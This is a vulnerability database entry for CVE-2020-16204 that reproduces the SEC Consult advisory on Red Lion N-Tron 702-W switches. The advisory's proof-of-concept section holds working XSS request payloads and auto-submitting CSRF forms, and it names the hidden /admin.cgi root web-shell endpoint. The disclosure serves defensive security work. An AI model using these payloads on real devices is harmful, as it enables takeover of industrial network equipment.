ID

VAR-202009-0591


CVE

CVE-2020-16204


TITLE

N-Tron 702-W and 702M12-W Vulnerability in private features in

Trust: 0.8

sources: JVNDB: JVNDB-2020-010485

DESCRIPTION

The affected product is vulnerable due to an undocumented interface found on the device, which may allow an attacker to execute commands as root on the device on the N-Tron 702-W / 702M12-W (all versions). N-Tron 702-W and 702M12-W Includes a vulnerability in a private feature.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Red Lion N-Tron 702-W/702M12-W is a high-voltage Ethernet switch product. Red Lion N-Tron 702-W/702M12-W has an undocumented interface vulnerability. Attackers can use this vulnerability to submit special requests and execute arbitrary commands with ROOT permissions. SEC Consult Vulnerability Lab Security Advisory < 20200902-0 > ======================================================================= title: Multiple Vulnerabilities product: Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W vulnerable version: <=2.0.26 fixed version: CVE number: CVE-2020-16210, CVE-2020-16206, CVE-2020-16208, CVE-2020-16204 impact: High homepage: https://www.redlion.net/ found: 2020-02-28 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "For over forty years, customers around the world have trusted Red Lion Controls. Our award-winning industrial automation and networking solutions provide critical information and controls to improve productivity, working with numerous devices and diverse protocols to access data." Source: https://www.redlion.net Business recommendation: ------------------------ The vendor recommends to change the hardware and use a newer product. SEC Consult recommends to remove the device from productive environments. Vulnerability overview/description: ----------------------------------- 1) Reflected Cross-Site Scripting (XSS) - CVE-2020-16210 A reflected cross-site scripting vulnerability was identified at the endpoint "/pingtest_action.cgi". An attacker is also able to perform actions in the context of the attacked user. 2) Stored Cross-Site Scripting (XSS) - CVE-2020-16206 Stored cross-site scripting vulnerabilities are present on multiple endpoints. Such placed payloads cannot be detected via browser-protection mechanisms as they are embedded into the web-interface. An attacker is also able to perform actions in the context of the attacked user. 3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208 CSRF protection is not implemented at all. Such a vulnerability enables an attacker to modify different configurations of a device by luring an authenticated user to click on a crafted link. An attacker is able to take over the device by exploiting this vulnerability. 4) Hidden OS Web-Shell Interface - CVE-2020-16204 An undocumented interface, that contains a web-shell to the underlying OS, was found to be present on the device. It is not referenced in the actual menu and is also not mentioned in the manual of the device. This endpoint seems to be a leftover of the used Atheros SDK. 5) Known BusyBox Vulnerabilities The used BusyBox toolkit in version 1.11.0 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. 6) Outdated and Vulnerable Software Components Outdated and vulnerable software components were found on the device during a quick examination. The vulnerabilities 1), 2), 3), 4) and 5) were manually verified on an emulated device by using the MEDUSA scalable firmware runtime. Proof of concept: ----------------- 1) Reflected Cross-Site Scripting (XSS) - CVE-2020-16210 The "pingtest_action.cgi" endpoint can be used to trigger reflected XSS. http://$IP/pingtest_action.cgi?action=pingtest&dst_ip_addr=1&dst_addr_select=127.0.0.1&lines=%3Chtml%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3C/html%3E 2) Stored Cross-Site Scripting (XSS) - CVE-2020-16206 Injection of a XSS payload is possible on multiple endpoints. An example for permanent XSS on the endpoint "/network.cgi" is the following request: ------------------------------------------------------------------------------- POST /network.cgi HTTP/1.1 Host: $IP Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------195698564115308644282115103021 Content-Length: 915 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Cookie: ui_language=en_US Upgrade-Insecure-Requests: 1 -----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="netmode" bridge -----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="wlanipmode" 0 -----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="brip" 192.168.1.202 -----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="brmask" 255.255.255.0 -----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="brgw" 192.168.1.1"><script>alert(document.location)</script> -----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="dns1" -----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="dns2" -----------------------------195698564115308644282115103021-- ------------------------------------------------------------------------------- This can also be embedded in the HTML code as shown below: ------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://$IP/network.cgi" method="POST" enctype="multipart/form-data"> <input type="hidden" name="netmode" value="bridge" /> <input type="hidden" name="wlanipmode" value="0" /> <input type="hidden" name="brip" value="192&#46;168&#46;1&#46;202" /> <input type="hidden" name="brmask" value="255&#46;255&#46;255&#46;0" /> <input type="hidden" name="brgw" value="192&#46;168&#46;1&#46;1&quot;&gt;&lt;script&gt;alert&#40;document&#46;location&#43;&quot;&#32;&gt;&#32;SEC&#45;Consult&quot;&#41;&lt;&#47;script&gt;" /> <input type="hidden" name="dns1" value="" /> <input type="hidden" name="dns2" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> ------------------------------------------------------------------------------- 3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208 CSRF can be triggered on each endpoint as the whole web-interface does not implement any protection mechanisms. Changing the hostname to "SEC Consult" can be done with the following embedded HTML code: ------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://$IP/system.cgi" method="POST" enctype="multipart/form-data"> <input type="hidden" name="hostname" value="SEC&#32;Consult" /> <input type="hidden" name="action" value="chhost" /> <input type="submit" value="Submit request" /> </form> </body> </html> ------------------------------------------------------------------------------- 4) Hidden OS Web-Shell Interface - CVE-2020-16204 The endpoint "/admin.cgi" is not referenced within the whole web-interface and also not documented in the manual. By browsing this endpoint, multiple actions can be natively triggered: * Execute commands in context of the root user * Upload files * Download files * Change access rights All other actions can be done via the command execution. 5) Known BusyBox Vulnerabilities The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on an emulated device: A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the vulnerability. ------------------------------------------------------------------------------- # ls "pressing <TAB>" test 55\;test.txt # ------------------------------------------------------------------------------- 6) Outdated Software Components By analyzing the firmware a lot of components are found to be outdated: * BusyBox 1.0.1 * PHP/FI 2.0.1 * Dnsmasq 2.35 * Boa 0.93.15 Vulnerable / tested versions: ----------------------------- the following firmware version has been tested: * Red Lion N-Tron 702-W / 2.0.26 * Red Lion N-Tron 702M12-W / 2.0.26 Vendor contact timeline: ------------------------ 2020-03-09: Contacting vendor through support.emea@redlion.net; No answer. 2020-03-17: Asked for status update; No answer. 2020-03-30: Asked for status update, added incoming.ics-cert@redlion.net to the list of recipients; No answer. 2020-04-13: Requested support for coordination from CERT@VDE for the advisory. Sent the advisory to the CERT. 2020-04-14: Security contact from CERT@VDE answered, that ICS-CERT was also in- formed. 2020-07-17: Asked contact at ICS-CERT for status update; Contact stated that they are waiting for an update of Red Lion. 2020-08-20: Received CISA draft for an advisory from CERT@VDE. 2020-08-28: Found the published advisory on CISA's website* which was released on 2020-08-27. 2020-09-02: Release of security advisory. * https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01 Solution: --------- Upgrade to newer hardware. Workaround: ----------- None. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF T. Weber / @2020

Trust: 2.25

sources: NVD: CVE-2020-16204 // JVNDB: JVNDB-2020-010485 // CNVD: CNVD-2020-49662 // PACKETSTORM: 159064

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2020-49662

AFFECTED PRODUCTS

vendor:redlionmodel:n-tron 702m12-wscope:eqversion:*

Trust: 1.0

vendor:redlionmodel:n-tron 702-wscope:eqversion:*

Trust: 1.0

vendor:red lion controlsmodel:n-tron 702-wscope: - version: -

Trust: 0.8

vendor:red lion controlsmodel:n-tron 702m12-wscope: - version: -

Trust: 0.8

vendor:redmodel:lion n-tron 702-wscope: - version: -

Trust: 0.6

vendor:redmodel:lion n-tron 702m12-wscope: - version: -

Trust: 0.6

sources: CNVD: CNVD-2020-49662 // JVNDB: JVNDB-2020-010485 // NVD: CVE-2020-16204

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2020-16204
value: CRITICAL

Trust: 1.0

NVD: JVNDB-2020-010485
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2020-49662
value: HIGH

Trust: 0.6

CNNVD: CNNVD-202008-1367
value: CRITICAL

Trust: 0.6

nvd@nist.gov: CVE-2020-16204
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.0

NVD: JVNDB-2020-010485
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

CNVD: CNVD-2020-49662
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2020-16204
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.1

Trust: 1.0

NVD: JVNDB-2020-010485
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2020-49662 // JVNDB: JVNDB-2020-010485 // CNNVD: CNNVD-202008-1367 // NVD: CVE-2020-16204

PROBLEMTYPE DATA

problemtype:CWE-912

Trust: 1.8

sources: JVNDB: JVNDB-2020-010485 // NVD: CVE-2020-16204

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202008-1367

TYPE

other

Trust: 0.6

sources: CNNVD: CNNVD-202008-1367

CONFIGURATIONS

sources: JVNDB: JVNDB-2020-010485

PATCH

title:Top Pageurl:https://www.redlion.net/

Trust: 0.8

sources: JVNDB: JVNDB-2020-010485

EXTERNAL IDS

db:ICS CERTid:ICSA-20-240-01

Trust: 3.1

db:NVDid:CVE-2020-16204

Trust: 3.1

db:PACKETSTORMid:159064

Trust: 1.7

db:JVNid:JVNVU90721897

Trust: 0.8

db:JVNDBid:JVNDB-2020-010485

Trust: 0.8

db:CNVDid:CNVD-2020-49662

Trust: 0.6

db:AUSCERTid:ESB-2020.2973

Trust: 0.6

db:CNNVDid:CNNVD-202008-1367

Trust: 0.6

sources: CNVD: CNVD-2020-49662 // JVNDB: JVNDB-2020-010485 // PACKETSTORM: 159064 // CNNVD: CNNVD-202008-1367 // NVD: CVE-2020-16204

REFERENCES

url:https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01

Trust: 3.7

url:http://seclists.org/fulldisclosure/2020/sep/6

Trust: 1.6

url:http://packetstormsecurity.com/files/159064/red-lion-n-tron-702-w-702m12-w-2.0.26-xss-csrf-shell.html

Trust: 1.6

url:https://nvd.nist.gov/vuln/detail/cve-2020-16204

Trust: 1.5

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16204

Trust: 0.8

url:https://jvn.jp/vu/jvnvu90721897/

Trust: 0.8

url:https://www.auscert.org.au/bulletins/esb-2020.2973/

Trust: 0.6

url:https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

Trust: 0.1

url:https://twitter.com/sec_consult

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2020-16206

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2020-16210

Trust: 0.1

url:https://www.redlion.net

Trust: 0.1

url:https://www.sec-consult.com

Trust: 0.1

url:http://$ip/pingtest_action.cgi?action=pingtest&dst_ip_addr=1&dst_addr_select=127.0.0.1&lines=%3chtml%3e%3cscript%3ealert(document.location)%3c/script%3e%3c/html%3e

Trust: 0.1

url:http://$ip/network.cgi"

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2020-16208

Trust: 0.1

url:http://$ip/system.cgi"

Trust: 0.1

url:https://www.redlion.net/

Trust: 0.1

url:https://www.sec-consult.com/en/contact/index.html

Trust: 0.1

url:http://blog.sec-consult.com

Trust: 0.1

url:https://www.sec-consult.com/en/career/index.html

Trust: 0.1

sources: CNVD: CNVD-2020-49662 // JVNDB: JVNDB-2020-010485 // PACKETSTORM: 159064 // CNNVD: CNNVD-202008-1367 // NVD: CVE-2020-16204

CREDITS

T. Weber

Trust: 0.7

sources: PACKETSTORM: 159064 // CNNVD: CNNVD-202008-1367

SOURCES

db:CNVDid:CNVD-2020-49662
db:JVNDBid:JVNDB-2020-010485
db:PACKETSTORMid:159064
db:CNNVDid:CNNVD-202008-1367
db:NVDid:CVE-2020-16204

LAST UPDATE DATE

2024-08-14T12:33:48.318000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2020-49662date:2020-08-31T00:00:00
db:JVNDBid:JVNDB-2020-010485date:2021-01-20T08:59:16
db:CNNVDid:CNNVD-202008-1367date:2020-09-07T00:00:00
db:NVDid:CVE-2020-16204date:2022-10-14T20:56:26.420

SOURCES RELEASE DATE

db:CNVDid:CNVD-2020-49662date:2020-08-31T00:00:00
db:JVNDBid:JVNDB-2020-010485date:2021-01-20T08:59:16
db:PACKETSTORMid:159064date:2020-09-03T23:32:32
db:CNNVDid:CNNVD-202008-1367date:2020-08-27T00:00:00
db:NVDid:CVE-2020-16204date:2020-09-01T21:15:12.037